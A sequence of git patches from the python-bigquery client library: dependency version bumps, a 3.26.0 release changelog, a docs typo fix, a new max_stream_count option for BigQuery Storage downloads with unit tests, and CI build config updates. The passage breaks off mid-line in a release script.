5 insertions(+), 5 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index aa2ccfc28..e51d3d8c9 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -13,8 +13,8 @@ geojson==3.1.0 geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' -google-api-core==2.19.2 -google-auth==2.34.0 +google-api-core==2.20.0 +google-auth==2.35.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.26.0 google-cloud-core==2.4.1 @@ -31,7 +31,7 @@ packaging===24.0; python_version == '3.7' packaging==24.1; python_version >= '3.8' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' -pandas==2.2.2; python_version >= '3.9' +pandas==2.2.3; python_version >= '3.9' proto-plus==1.24.0 pyarrow==12.0.1; python_version == '3.7' pyarrow==17.0.0; python_version >= '3.8' diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index f18db407e..c1aac4bac 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -7,4 +7,4 @@ ipython===8.0.1; python_version == '3.8' ipython===8.18.1; python_version >= '3.9' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' -pandas==2.2.2; python_version >= '3.9' +pandas==2.2.3; python_version >= '3.9' diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 0b906c4ea..c25253e96 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -10,4 +10,4 @@ matplotlib===3.7.4; python_version == '3.8' matplotlib==3.9.2; python_version >= '3.9' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' -pandas==2.2.2; python_version >= '3.9' +pandas==2.2.3; python_version >= '3.9' From a76af359525ef3c49c958663f81fd24c9d35e1e7 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 25 Sep 2024 15:47:57 -0400 Subject: [PATCH 016/202] chore(deps): bump fiona from 1.9.6 to 1.10.0 in /samples/geography (#2027) * chore(deps): bump fiona from 1.9.6 to 1.10.0 in /samples/geography Bumps [fiona](https://github.com/Toblerity/Fiona) from 1.9.6 to 1.10.0. - [Release notes](https://github.com/Toblerity/Fiona/releases) - [Changelog](https://github.com/Toblerity/Fiona/blob/main/CHANGES.txt) - [Commits](https://github.com/Toblerity/Fiona/compare/1.9.6...1.10.0) --- updated-dependencies: - dependency-name: fiona dependency-type: direct:production ... Signed-off-by: dependabot[bot] * pin fiona to 1.9.6 for python 3.7 --------- Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Lingqing Gan --- samples/geography/requirements.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index e51d3d8c9..cc0f3ad17 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -8,13 +8,14 @@ click-plugins==1.1.1 cligj==0.7.2 dataclasses==0.8; python_version < '3.7' db-dtypes==1.3.0 -Fiona==1.9.6 +Fiona===1.9.6; python_version == '3.7' +Fiona==1.10.0; python_version >= '3.8' geojson==3.1.0 geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' -google-api-core==2.20.0 -google-auth==2.35.0 +google-api-core==2.19.2 +google-auth==2.34.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.26.0 google-cloud-core==2.4.1 @@ -31,7 +32,7 @@ packaging===24.0; python_version == '3.7' packaging==24.1; python_version >= '3.8' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' -pandas==2.2.3; python_version >= '3.9' +pandas==2.2.2; python_version >= '3.9' proto-plus==1.24.0 pyarrow==12.0.1; python_version == '3.7' pyarrow==17.0.0; python_version >= '3.8' From cad34f1afe20bc430c631ba9c2b69e442281d08d Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Thu, 26 Sep 2024 11:48:45 -0700 Subject: [PATCH 017/202] chore(main): release 3.26.0 (#1973) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 28 ++++++++++++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 29 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 4a089b8b4..5de99a6ca 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,34 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.26.0](https://github.com/googleapis/python-bigquery/compare/v3.25.0...v3.26.0) (2024-09-25) + + +### Features + +* Include LegacyPandasError in init imports ([#2014](https://github.com/googleapis/python-bigquery/issues/2014)) ([3ab5e95](https://github.com/googleapis/python-bigquery/commit/3ab5e95984ad521027a4e1efd9f16767403e668d)) +* Use `bigquery-magics` package for the `%%bigquery` magic ([#1965](https://github.com/googleapis/python-bigquery/issues/1965)) ([60128a5](https://github.com/googleapis/python-bigquery/commit/60128a522375823422f238312521a2ce356d9177)) + + +### Bug Fixes + +* Add docfx to the presubmit configuration and delete docs-presubmit ([#1995](https://github.com/googleapis/python-bigquery/issues/1995)) ([bd83cfd](https://github.com/googleapis/python-bigquery/commit/bd83cfd2eb25cec58d59af8048f5188d748b083d)) +* Add warning when encountering unknown field types ([#1989](https://github.com/googleapis/python-bigquery/issues/1989)) ([8f5a41d](https://github.com/googleapis/python-bigquery/commit/8f5a41d283a965ca161019588d3a3b2947b04b5b)) +* Allow protobuf 5.x; require protobuf >=3.20.2; proto-plus >=1.22.3 ([#1976](https://github.com/googleapis/python-bigquery/issues/1976)) ([57bf873](https://github.com/googleapis/python-bigquery/commit/57bf873474382cc2cb34243b704bc928fa1b64c6)) +* Do not set job timeout extra property if None ([#1987](https://github.com/googleapis/python-bigquery/issues/1987)) ([edcb79c](https://github.com/googleapis/python-bigquery/commit/edcb79ca69dba30d8102abebb9d53bc76e4882ee)) +* Set pyarrow field nullable to False for a BigQuery field in REPEATED mode ([#1999](https://github.com/googleapis/python-bigquery/issues/1999)) ([5352870](https://github.com/googleapis/python-bigquery/commit/5352870283ca7d4652aefc73f12645bcf6e1363c)) + + +### Dependencies + +* Bump min version of google-api-core and google-cloud-core to 2.x ([#1972](https://github.com/googleapis/python-bigquery/issues/1972)) ([a958732](https://github.com/googleapis/python-bigquery/commit/a958732aed7d9bd51ffde3dc0e6cae9ad7455b54)) + + +### Documentation + +* Add short mode query sample & test ([#1978](https://github.com/googleapis/python-bigquery/issues/1978)) ([ba61a8a](https://github.com/googleapis/python-bigquery/commit/ba61a8ab0da541ba1940211875d7ea2e9e17dfa8)) +* Improve QueryJobConfig.destination docstring ([#2016](https://github.com/googleapis/python-bigquery/issues/2016)) ([1b4cca0](https://github.com/googleapis/python-bigquery/commit/1b4cca0a3cc788a4570705572d5f04172f6b4b24)) + ## [3.25.0](https://github.com/googleapis/python-bigquery/compare/v3.24.0...v3.25.0) (2024-06-17) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index fed077e26..ebc911253 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.25.0" +__version__ = "3.26.0" From 02706e26034570d0307ae47bf7c968945678eeac Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 26 Sep 2024 22:08:28 +0200 Subject: [PATCH 018/202] chore(deps): update all dependencies (#2031) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot Co-authored-by: Leah E. Cole <6719667+leahecole@users.noreply.github.com> --- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index c1aac4bac..4652fcdf2 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,4 +1,4 @@ -bigquery_magics==0.2.0 +bigquery_magics==0.3.0 db-dtypes==1.3.0 google.cloud.bigquery==3.25.0 google-cloud-bigquery-storage==2.26.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index c25253e96..c4b75f3db 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,4 +1,4 @@ -bigquery-magics==0.2.0 +bigquery-magics==0.3.0 db-dtypes==1.3.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.26.0 From e29b987956e5d80541ad9a573e902938a1373bda Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 1 Oct 2024 23:02:18 +0200 Subject: [PATCH 019/202] chore(deps): update all dependencies (#2033) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 12 ++++++------ samples/magics/requirements.txt | 4 ++-- samples/notebooks/requirements.txt | 4 ++-- samples/snippets/requirements.txt | 2 +- 5 files changed, 12 insertions(+), 12 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index dafb60b2a..383829d7d 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.25.0 +google-cloud-bigquery==3.26.0 google-auth-oauthlib==1.2.1 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index cc0f3ad17..1089dc195 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -9,14 +9,14 @@ cligj==0.7.2 dataclasses==0.8; python_version < '3.7' db-dtypes==1.3.0 Fiona===1.9.6; python_version == '3.7' -Fiona==1.10.0; python_version >= '3.8' +Fiona==1.10.1; python_version >= '3.8' geojson==3.1.0 geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' -google-api-core==2.19.2 -google-auth==2.34.0 -google-cloud-bigquery==3.25.0 +google-api-core==2.20.0 +google-auth==2.35.0 +google-cloud-bigquery==3.26.0 google-cloud-bigquery-storage==2.26.0 google-cloud-core==2.4.1 google-crc32c===1.5.0; python_version < '3.9' @@ -32,7 +32,7 @@ packaging===24.0; python_version == '3.7' packaging==24.1; python_version >= '3.8' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' -pandas==2.2.2; python_version >= '3.9' +pandas==2.2.3; python_version >= '3.9' proto-plus==1.24.0 pyarrow==12.0.1; python_version == '3.7' pyarrow==17.0.0; python_version >= '3.8' @@ -56,4 +56,4 @@ typing-extensions===4.7.1; python_version == '3.7' typing-extensions==4.12.2; python_version >= '3.8' typing-inspect==0.9.0 urllib3===1.26.18; python_version == '3.7' -urllib3==2.2.2; python_version >= '3.8' +urllib3==2.2.3; python_version >= '3.8' diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 4652fcdf2..6386fb6d2 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ -bigquery_magics==0.3.0 +bigquery_magics==0.4.0 db-dtypes==1.3.0 -google.cloud.bigquery==3.25.0 +google.cloud.bigquery==3.26.0 google-cloud-bigquery-storage==2.26.0 ipython===7.31.1; python_version == '3.7' ipython===8.0.1; python_version == '3.8' diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index c4b75f3db..7463e1afc 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,6 +1,6 @@ -bigquery-magics==0.3.0 +bigquery-magics==0.4.0 db-dtypes==1.3.0 -google-cloud-bigquery==3.25.0 +google-cloud-bigquery==3.26.0 google-cloud-bigquery-storage==2.26.0 ipython===7.31.1; python_version == '3.7' ipython===8.0.1; python_version == '3.8' diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index 9e181d963..65ce0be9f 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.25.0 +google-cloud-bigquery==3.26.0 From 1d8d0a0b0359ae6da5b99fd3fa8cb016b74b8a6c Mon Sep 17 00:00:00 2001 From: Jeff Quinlan-Galper Date: Wed, 9 Oct 2024 03:25:31 -0700 Subject: [PATCH 020/202] Fix typo in legacy docs (#2037) uspported -> supported Co-authored-by: Chalmer Lowe --- docs/bigquery/legacy_proto_types.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/bigquery/legacy_proto_types.rst b/docs/bigquery/legacy_proto_types.rst index bc1e93715..36e9984b9 100644 --- a/docs/bigquery/legacy_proto_types.rst +++ b/docs/bigquery/legacy_proto_types.rst @@ -3,7 +3,7 @@ Legacy proto-based Types for Google Cloud Bigquery v2 API .. warning:: These types are provided for backward compatibility only, and are not maintained - anymore. They might also differ from the types uspported on the backend. It is + anymore. They might also differ from the types supported on the backend. It is therefore strongly advised to migrate to the types found in :doc:`standard_sql`. Also see the :doc:`3.0.0 Migration Guide<../UPGRADING>` for more information. From 7372ad659fd3316a602e90f224e9a3304d4c1419 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 10 Oct 2024 05:32:25 -0400 Subject: [PATCH 021/202] feat: updates to allow users to set max_stream_count (#2039) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Adds a function `determine_requested_streams()` to compare `preserve_order` and the new argument `max_stream_count` to determine how many streams to request. ``` preserve_order (bool): Whether to preserve the order of streams. If True, this limits the number of streams to one (more than one cannot guarantee order). max_stream_count (Union[int, None]]): The maximum number of streams allowed. Must be a non-negative number or None, where None indicates the value is unset. If `max_stream_count` is set, it overrides `preserve_order`. ``` Fixes #2030 πŸ¦• --- google/cloud/bigquery/_pandas_helpers.py | 118 +++++++++++++++++++---- tests/unit/test__pandas_helpers.py | 31 ++++++ 2 files changed, 130 insertions(+), 19 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 210ab4875..bf7d10c0f 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -21,13 +21,14 @@ import logging import queue import warnings -from typing import Any, Union +from typing import Any, Union, Optional, Callable, Generator, List from google.cloud.bigquery import _pyarrow_helpers from google.cloud.bigquery import _versions_helpers from google.cloud.bigquery import schema + try: import pandas # type: ignore @@ -75,7 +76,7 @@ def _to_wkb(v): _to_wkb = _to_wkb() try: - from google.cloud.bigquery_storage import ArrowSerializationOptions + from google.cloud.bigquery_storage_v1.types import ArrowSerializationOptions except ImportError: _ARROW_COMPRESSION_SUPPORT = False else: @@ -816,18 +817,54 @@ def _nowait(futures): def _download_table_bqstorage( - project_id, - table, - bqstorage_client, - preserve_order=False, - selected_fields=None, - page_to_item=None, - max_queue_size=_MAX_QUEUE_SIZE_DEFAULT, -): - """Use (faster, but billable) BQ Storage API to construct DataFrame.""" + project_id: str, + table: Any, + bqstorage_client: Any, + preserve_order: bool = False, + selected_fields: Optional[List[Any]] = None, + page_to_item: Optional[Callable] = None, + max_queue_size: Any = _MAX_QUEUE_SIZE_DEFAULT, + max_stream_count: Optional[int] = None, +) -> Generator[Any, None, None]: + """Downloads a BigQuery table using the BigQuery Storage API. + + This method uses the faster, but potentially more expensive, BigQuery + Storage API to download a table as a Pandas DataFrame. It supports + parallel downloads and optional data transformations. + + Args: + project_id (str): The ID of the Google Cloud project containing + the table. + table (Any): The BigQuery table to download. + bqstorage_client (Any): An + authenticated BigQuery Storage API client. + preserve_order (bool, optional): Whether to preserve the order + of the rows as they are read from BigQuery. If True this limits + the number of streams to one and overrides `max_stream_count`. + Defaults to False. + selected_fields (Optional[List[SchemaField]]): + A list of BigQuery schema fields to select for download. If None, + all fields are downloaded. Defaults to None. + page_to_item (Optional[Callable]): An optional callable + function that takes a page of data from the BigQuery Storage API + max_stream_count (Optional[int]): The maximum number of + concurrent streams to use for downloading data. If `preserve_order` + is True, the requested streams are limited to 1 regardless of the + `max_stream_count` value. If 0 or None, then the number of + requested streams will be unbounded. Defaults to None. + + Yields: + pandas.DataFrame: Pandas DataFrames, one for each chunk of data + downloaded from BigQuery. + + Raises: + ValueError: If attempting to read from a specific partition or snapshot. + + Note: + This method requires the `google-cloud-bigquery-storage` library + to be installed. + """ - # Passing a BQ Storage client in implies that the BigQuery Storage library - # is available and can be imported. from google.cloud import bigquery_storage if "$" in table.table_id: @@ -837,10 +874,11 @@ def _download_table_bqstorage( if "@" in table.table_id: raise ValueError("Reading from a specific snapshot is not currently supported.") - requested_streams = 1 if preserve_order else 0 + requested_streams = determine_requested_streams(preserve_order, max_stream_count) - requested_session = bigquery_storage.types.ReadSession( - table=table.to_bqstorage(), data_format=bigquery_storage.types.DataFormat.ARROW + requested_session = bigquery_storage.types.stream.ReadSession( + table=table.to_bqstorage(), + data_format=bigquery_storage.types.stream.DataFormat.ARROW, ) if selected_fields is not None: for field in selected_fields: @@ -848,7 +886,8 @@ def _download_table_bqstorage( if _ARROW_COMPRESSION_SUPPORT: requested_session.read_options.arrow_serialization_options.buffer_compression = ( - ArrowSerializationOptions.CompressionCodec.LZ4_FRAME + # CompressionCodec(1) -> LZ4_FRAME + ArrowSerializationOptions.CompressionCodec(1) ) session = bqstorage_client.create_read_session( @@ -884,7 +923,7 @@ def _download_table_bqstorage( elif max_queue_size is None: max_queue_size = 0 # unbounded - worker_queue = queue.Queue(maxsize=max_queue_size) + worker_queue: queue.Queue[int] = queue.Queue(maxsize=max_queue_size) with concurrent.futures.ThreadPoolExecutor(max_workers=total_streams) as pool: try: @@ -910,7 +949,7 @@ def _download_table_bqstorage( # we want to block on the queue's get method, instead. This # prevents the queue from filling up, because the main thread # has smaller gaps in time between calls to the queue's get - # method. For a detailed explaination, see: + # method. For a detailed explanation, see: # https://friendliness.dev/2019/06/18/python-nowait/ done, not_done = _nowait(not_done) for future in done: @@ -949,6 +988,7 @@ def download_arrow_bqstorage( preserve_order=False, selected_fields=None, max_queue_size=_MAX_QUEUE_SIZE_DEFAULT, + max_stream_count=None, ): return _download_table_bqstorage( project_id, @@ -958,6 +998,7 @@ def download_arrow_bqstorage( selected_fields=selected_fields, page_to_item=_bqstorage_page_to_arrow, max_queue_size=max_queue_size, + max_stream_count=max_stream_count, ) @@ -970,6 +1011,7 @@ def download_dataframe_bqstorage( preserve_order=False, selected_fields=None, max_queue_size=_MAX_QUEUE_SIZE_DEFAULT, + max_stream_count=None, ): page_to_item = functools.partial(_bqstorage_page_to_dataframe, column_names, dtypes) return _download_table_bqstorage( @@ -980,6 +1022,7 @@ def download_dataframe_bqstorage( selected_fields=selected_fields, page_to_item=page_to_item, max_queue_size=max_queue_size, + max_stream_count=max_stream_count, ) @@ -1024,3 +1067,40 @@ def verify_pandas_imports(): raise ValueError(_NO_PANDAS_ERROR) from pandas_import_exception if db_dtypes is None: raise ValueError(_NO_DB_TYPES_ERROR) from db_dtypes_import_exception + + +def determine_requested_streams( + preserve_order: bool, + max_stream_count: Union[int, None], +) -> int: + """Determines the value of requested_streams based on the values of + `preserve_order` and `max_stream_count`. + + Args: + preserve_order (bool): Whether to preserve the order of streams. If True, + this limits the number of streams to one. `preserve_order` takes + precedence over `max_stream_count`. + max_stream_count (Union[int, None]]): The maximum number of streams + allowed. Must be a non-negative number or None, where None indicates + the value is unset. NOTE: if `preserve_order` is also set, it takes + precedence over `max_stream_count`, thus to ensure that `max_stream_count` + is used, ensure that `preserve_order` is None. + + Returns: + (int) The appropriate value for requested_streams. + """ + + if preserve_order: + # If preserve order is set, it takes precendence. + # Limit the requested streams to 1, to ensure that order + # is preserved) + return 1 + + elif max_stream_count is not None: + # If preserve_order is not set, only then do we consider max_stream_count + if max_stream_count <= -1: + raise ValueError("max_stream_count must be non-negative OR None") + return max_stream_count + + # Default to zero requested streams (unbounded). + return 0 diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index 203cc1d1c..3a5fddacc 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -18,6 +18,7 @@ import functools import operator import queue +from typing import Union from unittest import mock import warnings @@ -46,6 +47,7 @@ from google.cloud.bigquery import _pyarrow_helpers from google.cloud.bigquery import _versions_helpers from google.cloud.bigquery import schema +from google.cloud.bigquery._pandas_helpers import determine_requested_streams pyarrow = _versions_helpers.PYARROW_VERSIONS.try_import() @@ -2053,3 +2055,32 @@ def test_verify_pandas_imports_no_db_dtypes(module_under_test, monkeypatch): monkeypatch.setattr(module_under_test, "db_dtypes", None) with pytest.raises(ValueError, match="Please install the 'db-dtypes' package"): module_under_test.verify_pandas_imports() + + +@pytest.mark.parametrize( + "preserve_order, max_stream_count, expected_requested_streams", + [ + # If preserve_order is set/True, it takes precedence: + (True, 10, 1), # use 1 + (True, None, 1), # use 1 + # If preserve_order is not set check max_stream_count: + (False, 10, 10), # max_stream_count (X) takes precedence + (False, None, 0), # Unbounded (0) when both are unset + ], +) +def test_determine_requested_streams( + preserve_order: bool, + max_stream_count: Union[int, None], + expected_requested_streams: int, +): + """Tests various combinations of preserve_order and max_stream_count.""" + actual_requested_streams = determine_requested_streams( + preserve_order, max_stream_count + ) + assert actual_requested_streams == expected_requested_streams + + +def test_determine_requested_streams_invalid_max_stream_count(): + """Tests that a ValueError is raised if max_stream_count is negative.""" + with pytest.raises(ValueError): + determine_requested_streams(preserve_order=False, max_stream_count=-1) From 7b03d61b8bc848fa2fd2722ca5e2c628e2f76eac Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Fri, 1 Nov 2024 10:18:55 -0400 Subject: [PATCH 022/202] build: use multiScm for Kokoro release builds (#2049) Source-Link: https://github.com/googleapis/synthtool/commit/0da16589204e7f61911f64fcb30ac2d3b6e59b31 Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:5cddfe2fb5019bbf78335bc55f15bc13e18354a56b3ff46e1834f8e540807f05 Co-authored-by: Owl Bot --- .github/.OwlBot.lock.yaml | 4 +- .github/release-trigger.yml | 1 + .kokoro/docker/docs/requirements.txt | 42 +- .kokoro/docs/common.cfg | 2 +- .kokoro/release.sh | 2 +- .kokoro/release/common.cfg | 8 +- .kokoro/requirements.txt | 610 +++++++++---------- .kokoro/samples/python3.13/common.cfg | 40 ++ .kokoro/samples/python3.13/continuous.cfg | 6 + .kokoro/samples/python3.13/periodic-head.cfg | 11 + .kokoro/samples/python3.13/periodic.cfg | 6 + .kokoro/samples/python3.13/presubmit.cfg | 6 + .kokoro/test-samples-impl.sh | 3 +- CONTRIBUTING.rst | 6 +- samples/desktopapp/noxfile.py | 2 +- samples/geography/noxfile.py | 2 +- samples/magics/noxfile.py | 2 +- samples/notebooks/noxfile.py | 2 +- samples/snippets/noxfile.py | 2 +- 19 files changed, 398 insertions(+), 359 deletions(-) create mode 100644 .kokoro/samples/python3.13/common.cfg create mode 100644 .kokoro/samples/python3.13/continuous.cfg create mode 100644 .kokoro/samples/python3.13/periodic-head.cfg create mode 100644 .kokoro/samples/python3.13/periodic.cfg create mode 100644 .kokoro/samples/python3.13/presubmit.cfg diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 597e0c326..7672b49b6 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:e8dcfd7cbfd8beac3a3ff8d3f3185287ea0625d859168cc80faccfc9a7a00455 -# created: 2024-09-16T21:04:09.091105552Z + digest: sha256:5cddfe2fb5019bbf78335bc55f15bc13e18354a56b3ff46e1834f8e540807f05 +# created: 2024-10-31T01:41:07.349286254Z diff --git a/.github/release-trigger.yml b/.github/release-trigger.yml index d4ca94189..4bb79e58e 100644 --- a/.github/release-trigger.yml +++ b/.github/release-trigger.yml @@ -1 +1,2 @@ enabled: true +multiScmName: diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt index 7129c7715..66eacc82f 100644 --- a/.kokoro/docker/docs/requirements.txt +++ b/.kokoro/docker/docs/requirements.txt @@ -4,39 +4,39 @@ # # pip-compile --allow-unsafe --generate-hashes requirements.in # -argcomplete==3.4.0 \ - --hash=sha256:69a79e083a716173e5532e0fa3bef45f793f4e61096cf52b5a42c0211c8b8aa5 \ - --hash=sha256:c2abcdfe1be8ace47ba777d4fce319eb13bf8ad9dace8d085dcad6eded88057f +argcomplete==3.5.1 \ + --hash=sha256:1a1d148bdaa3e3b93454900163403df41448a248af01b6e849edc5ac08e6c363 \ + --hash=sha256:eb1ee355aa2557bd3d0145de7b06b2a45b0ce461e1e7813f5d066039ab4177b4 # via nox colorlog==6.8.2 \ --hash=sha256:3e3e079a41feb5a1b64f978b5ea4f46040a94f11f0e8bbb8261e3dbbeca64d44 \ --hash=sha256:4dcbb62368e2800cb3c5abd348da7e53f6c362dda502ec27c560b2e58a66bd33 # via nox -distlib==0.3.8 \ - --hash=sha256:034db59a0b96f8ca18035f36290806a9a6e6bd9d1ff91e45a7f172eb17e51784 \ - --hash=sha256:1530ea13e350031b6312d8580ddb6b27a104275a31106523b8f123787f494f64 +distlib==0.3.9 \ + --hash=sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87 \ + --hash=sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403 # via virtualenv -filelock==3.15.4 \ - --hash=sha256:2207938cbc1844345cb01a5a95524dae30f0ce089eba5b00378295a17e3e90cb \ - --hash=sha256:6ca1fffae96225dab4c6eaf1c4f4f28cd2568d3ec2a44e15a08520504de468e7 +filelock==3.16.1 \ + --hash=sha256:2082e5703d51fbf98ea75855d9d5527e33d8ff23099bec374a134febee6946b0 \ + --hash=sha256:c249fbfcd5db47e5e2d6d62198e565475ee65e4831e2561c8e313fa7eb961435 # via virtualenv -nox==2024.4.15 \ - --hash=sha256:6492236efa15a460ecb98e7b67562a28b70da006ab0be164e8821177577c0565 \ - --hash=sha256:ecf6700199cdfa9e5ea0a41ff5e6ef4641d09508eda6edb89d9987864115817f +nox==2024.10.9 \ + --hash=sha256:1d36f309a0a2a853e9bccb76bbef6bb118ba92fa92674d15604ca99adeb29eab \ + --hash=sha256:7aa9dc8d1c27e9f45ab046ffd1c3b2c4f7c91755304769df231308849ebded95 # via -r requirements.in packaging==24.1 \ --hash=sha256:026ed72c8ed3fcce5bf8950572258698927fd1dbda10a5e981cdf0ac37f4f002 \ --hash=sha256:5b8f2217dbdbd2f7f384c41c628544e6d52f2d0f53c6d0c3ea61aa5d1d7ff124 # via nox -platformdirs==4.2.2 \ - --hash=sha256:2d7a1657e36a80ea911db832a8a6ece5ee53d8de21edd5cc5879af6530b1bfee \ - --hash=sha256:38b7b51f512eed9e84a22788b4bce1de17c0adb134d6becb09836e37d8654cd3 +platformdirs==4.3.6 \ + --hash=sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907 \ + --hash=sha256:73e575e1408ab8103900836b97580d5307456908a03e92031bab39e4554cc3fb # via virtualenv -tomli==2.0.1 \ - --hash=sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc \ - --hash=sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f +tomli==2.0.2 \ + --hash=sha256:2ebe24485c53d303f690b0ec092806a085f07af5a5aa1464f3931eec36caaa38 \ + --hash=sha256:d46d457a85337051c36524bc5349dd91b1877838e2979ac5ced3e710ed8a60ed # via nox -virtualenv==20.26.3 \ - --hash=sha256:4c43a2a236279d9ea36a0d76f98d84bd6ca94ac4e0f4a3b9d46d05e10fea542a \ - --hash=sha256:8cc4a31139e796e9a7de2cd5cf2489de1217193116a8fd42328f1bd65f434589 +virtualenv==20.26.6 \ + --hash=sha256:280aede09a2a5c317e409a00102e7077c6432c5a38f0ef938e643805a7ad2c48 \ + --hash=sha256:7345cc5b25405607a624d8418154577459c3e0277f5466dd79c49d5e492995f2 # via nox diff --git a/.kokoro/docs/common.cfg b/.kokoro/docs/common.cfg index 41b86fc29..76ae5f13b 100644 --- a/.kokoro/docs/common.cfg +++ b/.kokoro/docs/common.cfg @@ -63,4 +63,4 @@ before_action { keyname: "docuploader_service_account" } } -} \ No newline at end of file +} diff --git a/.kokoro/release.sh b/.kokoro/release.sh index 453d6f702..65deb5ed3 100755 --- a/.kokoro/release.sh +++ b/.kokoro/release.sh @@ -23,7 +23,7 @@ python3 -m releasetool publish-reporter-script > /tmp/publisher-script; source / export PYTHONUNBUFFERED=1 # Move into the package, build the distribution and upload. -TWINE_PASSWORD=$(cat "${KOKORO_KEYSTORE_DIR}/73713_google-cloud-pypi-token-keystore-2") +TWINE_PASSWORD=$(cat 